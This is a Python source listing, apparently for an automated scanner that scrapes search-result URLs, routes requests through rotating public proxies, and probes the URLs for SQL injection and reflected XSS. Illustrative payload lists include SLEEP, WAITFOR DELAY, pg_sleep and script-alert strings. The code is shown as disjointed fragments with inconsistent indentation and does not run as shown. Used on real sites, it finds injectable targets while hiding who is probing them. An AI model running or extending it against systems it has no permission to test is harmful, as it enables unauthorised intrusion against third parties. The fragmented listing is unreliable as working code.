def run_tests(links, testLevel=1, v=False):
    if not links:
        bcolors.printFail("[-]Invalid input parameters! Exiting...")
        return
    proxyhandler = Proxy(True)
    proxyhandler.proxify()
    proxyhandler.validate_proxy()
    TestObjects = []
    for link in links:
        sqlI = True  # Tracks whether the second, time-based SQL injection test is still needed
        res = sql_error_scan(link, v)
        if res is not None:
            TestObjects.append(TestObject.TestObject(link, "SQLi", res))
            sqlI = False
        # Time-based SQLi
        if testLevel > 1 and sqlI:
            res = sql_time_scan(link, v)
            if res is not None:
                TestObjects.append(TestObject.TestObject(link, "SQLiT", res))
        # XSS
        if testLevel > 2:
            res = xss_vuln_scan(link, v)
            if res is not None:
                TestObjects.append(TestObject.TestObject(link, "XSS", res))
    if v:
        if TestObjects:
            bcolors.printGreen("~*~*~*~*~PRINTING FOUND TARGETS~*~*~*~*~")
            for t in TestObjects:
                t.print_test()
        else:
            bcolors.printFail("~*~*~*~*~NO TARGETS FOUND~*~*~*~*~")
    return TestObjects
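
A minimal driver for the scanner might look like the sketch below; the entry-point wiring and the sample target URL are assumptions, not part of the original module.

# Hypothetical usage sketch -- the target URL is a placeholder.
if __name__ == "__main__":
    candidate_links = ["http://example.com/page.php?id=1"]  # assumed input
    findings = run_tests(candidate_links, testLevel=3, v=True)
    # findings is a list of TestObject instances, one per detected issue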
    def get_http_proxy(self, nrOfProxies=1, https=False, google=False):
        if self.verbose:
            print("[*]Parameters: nrOfProxies=%d, https=%r, google=%r" %
                  (nrOfProxies, https, google))

        httpProxies = []
        tree = self._get_tree(data.url_http)
        found = 0
        i = 1
        bcolors.printGreen("Starting proxy scan!")
        while found < nrOfProxies:
            # Rows on the proxy-list page are 1-indexed in the xpath query
            proxy = tree.xpath(data.path + "[%d]/td/text()" % i)
            if self.verbose:
                print("Found proxy: " + str(proxy))
            if not proxy:
                print("Could not find proxy!")
                return None
            if (self._validate(proxy, https, google)
                    and self.format_proxies(proxy)[0] not in self.blacklist):
                if self.verbose:
                    bcolors.printGreen("Proxy meeting requirements found!")
                httpProxies.append(proxy)
                found += 1
            i += 1
        return httpProxies
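
A usage sketch, assuming get_http_proxy is a method of the Proxy class used elsewhere in this listing:

# Hypothetical usage -- assumes Proxy(verbose) as seen in run_tests above.
handler = Proxy(True)
proxies = handler.get_http_proxy(nrOfProxies=3, https=True)
if proxies is None:
    print("Proxy list exhausted before enough candidates were found")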
def sql_time_scan(url, v=False):
    # Measure the page's normal load time so the timeout can be scaled to it
    req = urllib.request.Request(url, None, data.headers)
    timeStart = time.time()
    try:
        response = urllib.request.urlopen(req)
    except Exception:
        return None

    latency = time.time() - timeStart
    if v:
        print("[*]Latency is " + str(latency))
    # A response slower than three times the baseline latency is treated as
    # evidence that an injected sleep command executed
    socket.setdefaulttimeout(3 * latency)

    for test in data.sleepCommands:
        req = urllib.request.Request(url + test, None, data.headers)
        try:
            response = urllib.request.urlopen(req)
        except socket.timeout:
            if v:
                bcolors.printGreen(
                    "[+]Time-based SQL vulnerability found in url: " + url)
            return test
        except Exception:
            continue
    return None
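
The payloads in data.sleepCommands are defined elsewhere in the project; a representative set consistent with this scan might look like the following (illustrative values, not the module's actual data):

# Illustrative only -- the real data.sleepCommands list lives in the data module.
sleepCommands = [
    "' AND SLEEP(10)-- -",           # MySQL
    "'; WAITFOR DELAY '0:0:10'--",   # Microsoft SQL Server
    "' AND pg_sleep(10)-- -",        # PostgreSQL
]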
    def _strip_url(self, link):
        # Cut everything from "&sa=" onwards, then drop Google's "/url?q=" prefix
        regex = '(?=&sa=).+'
        url = ''.join(link)
        url = url.replace("['/url?q=", "")
        url = re.sub(regex, '', url)
        if self.verbose:
            bcolors.printGreen("[+]Extracted url: " + url)
        return url
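
A standalone sketch of the same stripping logic; the scraped link format is an assumption based on Google's result markup:

# Illustrative only -- assumes Google-style result links.
import re
link = "/url?q=http://example.com/page.php&sa=U&ved=0ahUKE"
print(re.sub('(?=&sa=).+', '', link).replace("/url?q=", ""))
# -> http://example.com/page.php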
def sql_error_scan(url, v=False):
    # Append a lone quote and look for database error messages in the response
    req = urllib.request.Request(url + "'", None, data.headers)

    try:
        src = urllib.request.urlopen(req).read()
    except Exception:
        return None

    for err in data.errorStrings:
        if err in str(src):
            if v:
                bcolors.printGreen("[+]Found '" + err + "' reference in url: " + url)
            return "'"
    return None
    def install_proxy(self, proxf, proxfhttps=None):
        # Route all subsequent urllib traffic through the given proxies
        if proxfhttps is None:
            proxy = urllib.request.ProxyHandler({'http': proxf})
        else:
            proxy = urllib.request.ProxyHandler({
                'http': proxf,
                'https': proxfhttps
            })
        opener = urllib.request.build_opener(proxy)
        urllib.request.install_opener(opener)
        self.currentHttpProxy = proxf
        self.currentHttpsProxy = proxfhttps
        if self.verbose:
            bcolors.printGreen("[+]New proxies installed!")
    def __init__(self, useproxy, retries=None, verbose=False, sleep=5):
        self.urls = []  # contains scraped urls
        self.blacklist = []  # contains blacklisted proxies
        self.useproxy = useproxy  # dictates use of proxy
        self.retries = retries  # number of search retries; None means unlimited
        self.verbose = verbose  # sets verbosity level
        self.sleep = sleep  # seconds to wait between url searches
        self.cookie_jar = http.cookiejar.CookieJar()

        self.proxyhandler = None
        if self.useproxy:
            self.proxyhandler = Proxy(self.verbose)
            self.proxyhandler.proxify()
        if self.verbose:
            bcolors.printGreen("[+]Search object created!")
def xss_vuln_scan(url, v=False):
    for test in data.xssStrings:
        req = urllib.request.Request(url + test, None, data.headers)
        try:
            response = urllib.request.urlopen(req)
            src = response.read()
        except socket.timeout:
            return None  # Don't keep going if the site is down
        except Exception:
            continue

        # If a payload marker comes back unescaped, the page reflects input
        if ('<script>alert("1VULN")' in str(src)
                or '<IMG SRC=javascript:alert' in str(src)
                or "<1VULN>" in str(src)):
            if v:
                bcolors.printGreen("[+]Found XSS vulnerability in url: " + url)
            return test
    return None
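
data.xssStrings is defined elsewhere; payloads consistent with the markers checked above might look like this (illustrative only):

# Illustrative only -- the real data.xssStrings list lives in the data module.
xssStrings = [
    '<script>alert("1VULN")</script>',
    '<IMG SRC=javascript:alert("1VULN")>',
    '<1VULN>',
]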